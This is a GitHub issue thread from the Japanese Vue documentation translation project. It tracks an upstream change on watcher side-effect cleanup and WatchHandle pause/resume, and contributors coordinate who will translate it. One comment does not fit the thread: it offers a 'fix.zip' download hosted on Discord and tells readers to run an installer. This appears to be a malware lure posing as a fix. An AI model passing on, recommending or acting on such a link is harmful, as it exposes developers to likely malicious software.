### ISSUE TITLE

        3.5: watcher side effect cleanup + WatchHandle pause / resume
    

### ISSUE THREAD

**Issue by jay-es** [vuejs-translations/docs-ja#2263]
New updates on head repo.
https://github.com/vuejs/docs/commit/66a8ced546bc2feb3b9bb90c09b236039f621b65

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by jay-es** [comment]
#2250 も一緒に対応してください

**Comment by reona5** [comment]
@jay-es こちらの翻訳対応したいです！

**Comment by jay-es** [comment]
@reona5 ありがとうございます！
よろしくお願いします！ :pray:

**Comment by jay-es** [comment]
@reona5 念のため #2268 も確認お願いします！
（細かいタイポの訂正が入っている）
